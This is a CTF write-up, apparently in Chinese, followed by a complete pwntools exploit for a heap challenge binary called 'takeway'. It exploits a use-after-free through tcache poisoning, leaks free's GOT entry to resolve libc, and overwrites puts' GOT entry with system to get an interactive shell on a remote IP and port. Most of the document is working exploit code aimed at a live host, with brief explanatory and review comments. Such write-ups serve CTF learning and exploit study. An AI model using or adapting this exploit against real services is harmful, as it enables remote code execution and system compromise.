delete后指针没有置空,存在UAF漏洞
先把限制chunk构建次数的5改大,然后泄露free_got来泄露libc地址,最后改puts的got表改为system
直接把chunk malloc到got表会直接EOF,所以选择malloc到got区域上面的2个数字为0的区域(超级麻烦,求求更加简便的做法)
* exp:
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
# p = process(["/mnt/d/desktop/glibc-all-in-one/libs/2.31-0ubuntu9_amd64/ld-2.31.so", "./takeway"],
# env={"LD_PRELOAD":"/mnt/d/desktop/glibc-all-in-one/libs/2.31-0ubuntu9_amd64/libc-2.31.so"})
# p = process(["/mnt/d/desktop/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/ld-2.27.so", "./takeway"],
# env={"LD_PRELOAD":"/mnt/d/desktop/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc.so.6"})
# gdb.attach(p)
# Connection to the target; the local `process(...)` variants above are kept as comments.
p = remote('101.200.234.115', 43104)
# p=process('./takeway')
# NOTE(review): arch='arm64' looks like a leftover — the commented-out local runs
# above load amd64 glibc builds. The setting would matter for asm()/shellcraft,
# which this script never calls; confirm before reusing the file elsewhere.
context.update(arch='arm64', os='linux', log_level='debug')
elf = ELF('./takeway')
# libc=ELF('/mnt/d/desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')
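def add(index, name, content):
    """Drive menu option 1 ("add") of the remote service.

    Args:
        index: slot number sent after choosing option 1 (int; encoded as ASCII digits).
        name: bytes sent at the food-name prompt (a newline is appended).
        content: bytes sent at the remark prompt. Sent with send(), not
            sendline(), so the caller controls the exact byte count.

    Prompts and payloads are all passed as bytes so pwntools does not have to
    fall back to its implicit str->bytes conversion; the exchange itself is
    unchanged from the original helper.
    """
    p.recvuntil(b'Please input your choose: ')
    p.sendline(b'1')
    p.sendline(str(index).encode())
    p.recvuntil(b'Please input your food name: ')
    p.sendline(name)
    p.recvuntil(b'remark: ')
    p.send(content)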
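def rename(index, new_name):
    """Drive menu option 3 ("rename") of the remote service.

    Args:
        index: slot number sent at the index prompt (int; encoded as ASCII digits).
        new_name: bytes sent at the "New food name is:" prompt (a newline is appended).

    Whatever the service prints between the index prompt and the name prompt
    is consumed by recvuntil() and not returned; callers that need that output
    have to run the exchange inline. Prompts are bytes to avoid pwntools'
    implicit str->bytes conversion.
    """
    p.recvuntil(b'Please input your choose: ')
    p.sendline(b'3')
    p.recvuntil(b'Please input index: ')
    p.sendline(str(index).encode())
    p.recvuntil(b'New food name is: ')
    p.sendline(new_name)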
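def delete(index):
    """Drive menu option 2 ("delete") of the remote service.

    Args:
        index: order index sent at the prompt (int; encoded as ASCII digits).

    The helper keeps no record of which indices were already sent; it only
    performs the exchange. Prompts are bytes to avoid pwntools' implicit
    str->bytes conversion.
    """
    p.recvuntil(b'Please input your choose: ')
    p.sendline(b'2')
    p.recvuntil(b'Please input your order index: ')
    p.sendline(str(index).encode())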
# Fixed request/response script against the service. Root cause, as stated in
# the writeup header: the service does not clear its chunk pointer after
# delete, so later operations on a freed index touch freed memory. The
# server-side fix is to null the pointer (and mark the slot unused) on delete
# and to reject such indices in rename/delete. Call order matters throughout,
# so the code is left as-is and only annotated.

# Round 1 — the writeup says this is used to lift the "5 chunks" creation limit.
add(0,b'aaaa',b'/bin/sh\x00')
add(1,b'bbbb',b'/bin/sh\x00')
delete(0)
delete(1)
# 8-byte little-endian value written into index 1 after it was deleted.
# NOTE(review): 0x404088-0x8 is a binary-specific address; its meaning is not
# derivable from this file — confirm against ./takeway.
rename(1,p64(0x404088-0x8))
add(2,b'aaaa',b'aaaa')
# b'60' is presumably the new, larger limit the writeup refers to — verify.
add(3,b'6666',b'60')

# Round 2 — leak; the writeup says this exposes free's GOT entry.
add(4,b'bbbb',b'/bin/sh\x00')
add(100,b'bbbb',b'/bin/sh\x00')
delete(4)
delete(100)
rename(100,p64(0x404008))
add(101,b'bbbb',b'/bin/sh\x00')
add(102,b'aaaa',b'aaaaaaaa')
# rename() repeated inline so the output between the index prompt and the
# name prompt can be captured. The service appears to echo the current entry
# ("order is: ..."); the 6 bytes after the 8-byte b'aaaaaaaa' marker are
# zero-extended and read as a 64-bit little-endian address.
p.recvuntil('Please input your choose: ')
p.sendline(b'3')
p.recvuntil('Please input index: ')
p.sendline(str(102))
p.recvuntil('order is: ')
p.recvuntil('aaaaaaaa')
free_addr=u64(p.recv(6).ljust(8,b'\x00'))
print("free_addr =",hex(free_addr))
p.recvuntil('New food name is: ')
p.sendline(b'1')
# LibcSearcher (third-party, external database) derives offsets from one leaked
# symbol address; it may pick the wrong build when several candidates match.
# The commented-out local libc ELF at the top of the file would be exact.
libc = LibcSearcher('free',free_addr)
libc_base=free_addr-libc.dump('free')
system=libc_base+libc.dump('system')

# Round 3 — the writeup says this replaces puts' GOT entry with system.
add(103,b'bbbb',b'/bin/sh\x00')
add(104,b'bbbb',b'/bin/sh\x00')
delete(103)
delete(104)
rename(104,p64(0x404010))
add(105,b'bbbb',b'/bin/sh\x00')
# 16-byte remark: the leaked free address followed by the computed system address.
add(106,b'aaaa',p64(free_addr)+p64(system))
# Same rename exchange as above, stopped after the index so the session can be
# handed to the user interactively.
p.recvuntil('Please input your choose: ')
p.sendline(b'3')
p.recvuntil('Please input index: ')
p.sendline(str(106))
p.interactive()